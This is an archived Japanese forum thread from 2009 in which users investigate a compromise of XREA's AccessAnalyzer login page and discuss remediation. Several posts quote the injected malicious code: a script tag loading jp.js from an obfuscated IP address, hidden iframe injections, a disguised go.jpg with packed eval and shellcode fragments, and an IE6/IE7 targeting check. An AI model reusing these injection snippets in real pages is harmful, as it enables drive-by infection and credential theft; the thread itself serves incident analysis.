【アクセス解析】AccessAnalyzer.com Part5【XREA】

このエントリーをはてなブックマークに追加
554Name_Not_Found
情報元 ttp://pc11.2ch.net/test/read.cgi/hosting/1246828727/

511 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:01:49 P
あ、関係ないかもしれないけど、
今XREAのアクセスアナライザー ttp://ax.xrea.com/
のログイン画面で、アバスト反応した。
↓こんなんみたいだけど。
JS:CVE-2008-0015-A [Expl]
これって今回の騒動は関係ない?

514 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:04:42 0
>>511

</head>タグのちょうどうえ

<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement('script');
js.src ="http://1856317799:888/jp.js";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>
</HEAD>

551 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:24:48 0
>>539
ax.xrea.comは2台だな。
219.101.229.188 ←やられてる
219.101.229.189 ←やられてない
555Name_Not_Found:2009/07/08(水) 17:24:26 ID:???
>>554
乙。

ageましょうか?
556Name_Not_Found:2009/07/08(水) 17:38:50 ID:???
>>554
これ何?
ウイルス?
557Name_Not_Found:2009/07/08(水) 17:44:39 ID:???
ax.xrea.com
http://wepawet.cs.ucsb.edu/view.php?hash=58ad9f9f57a66bdddf69e86e9701cbc6&t=1247041861&type=js

ax.xrea.com/login.php
http://wepawet.cs.ucsb.edu/view.php?hash=9fab8d84e3289b2a7c5f9cdbd4043c09&t=1247041318&type=js

アウトっぽい。改ざんかな
Result :malicious (悪意あり)
558Name_Not_Found:2009/07/08(水) 17:46:11 ID:???
なにそれ、こわい。
559Name_Not_Found:2009/07/08(水) 17:49:16 ID:???
>>554のスレの検証結果だと
windowsの虚弱性ついたキーロガーらしい


http://www.ipa.go.jp/security/ciadr/vul/20090707-ms-activex.html
攻撃者がこの脆弱性を悪用した攻撃コードを埋め込んだサイトを作成し、
ユーザが Internet Explorer でそのサイトを閲覧した場合、
攻撃者がユーザのパソコンを制御できるようになる恐れがあります。


同じパターンならパスワード抜きでもしかけられたかな
560Name_Not_Found:2009/07/08(水) 17:51:51 ID:???
>>559
マジでまずいんじゃね?
キーロガーを仕込まれてる可能性がある場合、
どういう対処をすればいい?
561Name_Not_Found:2009/07/08(水) 17:58:55 ID:???
>>559
キーロガー自体は脆弱性をついてるわけじゃない

>>560
一番安心安全なのはOS入れなおし
その後クリーンな環境になってからWebサービスのパスワードを全部変更
メールアドレスや各種ログインするサイト全て
mixiみたいなとこもね
562Name_Not_Found:2009/07/08(水) 18:16:08 ID:???
確かに違う、これはおかしい

>nslookup ax.xrea.com
Non-authoritative answer:
Name: ax.xrea.com
Address: 219.101.229.189
Name: ax.xrea.com
Address: 219.101.229.188

>wget -qO- http://219.101.229.189/login.php | md5; echo
219.101.229.189
b3782c67d6af86b38b06464f6ac9c10c ★これと

>wget -qO- http://219.101.229.188/login.php | md5; echo
219.101.229.188
55d334703972573546362e8734be34f9 ★これが合わない
563Name_Not_Found:2009/07/08(水) 18:31:04 ID:???
改ざん?されたらしいほうのところを調査

gifトロイやらなんやら一杯はいってるね。自己解凍cabが偽装されてたりするし
でも大体は最新にアップデートしてればおkかな

でも、一番の問題は、これかな
http://1856317799:888/dir2/go.jpg

一見拡張子からjpgファイルっぽいけど、
> more go.jpg
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e
以下長いので略

まぁ、スクリプトが偽装してある、これがまだ回避策のみでパッチがででてない虚弱性
972890
http://www.microsoft.com/japan/technet/security/advisory/972890.mspx
なのかな
564Name_Not_Found:2009/07/08(水) 18:42:14 ID:???
のーとん先生が反応してくれたので急いでここにきた・・・
くそー、なんなんだお・・・\(^o^)/
565Name_Not_Found:2009/07/08(水) 18:56:20 ID:???
一体どうしたというんだよ・・・
笑えるわ
566Name_Not_Found:2009/07/08(水) 18:57:34 ID:???
vistaなら大丈夫なんだろ
567Name_Not_Found:2009/07/08(水) 19:00:08 ID:???
Windows Vista または Windows Server 2008 を使用しているお客様については、
Internet Explorer でこのコントロールにデータを渡す機能が制限されているため、
この脆弱性の影響を受けません。


だってよ
XP\(^o^)/ オワタ
568Name_Not_Found:2009/07/08(水) 19:13:30 ID:???
じわじわと何やられてんのかなーと調べ中。どうみてもあやしいjp.jsの中身を見てみる
>>563もそうだけど、大丈夫かは明確じゃないんでwindowsでは調べるのやらないほうがいいと思います。
とりあえず俺はFreeBSDなんでそれでやってます

>more jp.js
/*dsadasdadasdasdasdas*/
if(document.cookie.indexOf("J=")==-1)
{
var js = document.createElement('iframe');
js.src ="http:¥/¥/0x6EA52967:888/dir2/show.php";
width=0; height=0;
try {document.getElementsByTagName('head')[0].appendChild(js);}
以下略

なんか差し込まれてるね
とはいえ、show.phpはさすがに何も吐いてこない、うーむ。さらに後ろを見てみる

var fr = document.createElement('iframe');
fr.src ="http:¥/¥/1856317799:888\/counter.htm";
width=0;
height=0;
try {document.getElementsByTagName('head')[0].appendChild(fr);}

なんか呼ばれてるcounter.htmをみてみる
<!-- shinobi ct2 -->
<script type="text/javascript" src="http://ct2.shinobi.jp/sc/1298877"></script>
<noscript><a href="http://ct2.shinobi.jp/gg/1298877" target="_blank"><img src="http://ct2.shinobi.jp/ll/1298877"
border="0" alt="<A5><AB><A5><A6><A5><F3><A5><BF><A9>`"></a></noscript>
<!-- /shinobi ct2 -->

ん? 忍者ツールだと……。
もうちょっと調べてみるかな。なにやってんだろうね
569Name_Not_Found:2009/07/08(水) 19:15:05 ID:???
あ、>>568で一部全角にしわすれた。不明瞭なリンクはクリックしないほうがいいと思います
570Name_Not_Found:2009/07/08(水) 19:18:08 ID:???
デジロックの関連スレもチェックしとけよ
特にVDスレ

VALUE DOMAINってどうよ? part33
http://pc11.2ch.net/test/read.cgi/hosting/1246828727/

xrea.com part146
http://pc11.2ch.net/test/read.cgi/hosting/1246931972/
571Name_Not_Found:2009/07/08(水) 19:28:07 ID:???
ノートンがブロックしてくれてればセフセフ?
572Name_Not_Found:2009/07/08(水) 19:30:53 ID:???
avast入れてアクセスしてみたけど反応ない。
引っかかってるのかなぁ・・・
573Name_Not_Found:2009/07/08(水) 19:31:07 ID:???
MSはまだ正式対応してないけどパッチか何か公式で配布してたよね?
574Name_Not_Found:2009/07/08(水) 19:32:26 ID:???
いろいろしらべていくと、あぁなるほど

で、
<script src='go.jpg'></script>
で、問題のjpgをスクリプトとして読み込ませてますね

他の関係なさそうなファイル見てみると
if(user.indexOf("msie 6")==-1&user.indexOf("msie 7")==-1)
ともあるので、
これも同じように、IE6とIE7の狙い撃ちかな? わざわざ律儀ですね

でも、whoisとかで調べていくと、
hellh.netということで、
おそらく、本体は、各種ネトゲのアカウントハックってところでしょうかね
ネトゲやってないと問題ない、なんて思っても、
この手のウイルスはレジストラに残るとネットワーク重くしたりといろいろうざいんで、
対応したほうがいいですね

とりあえず俺は大体わかったんで、ここまで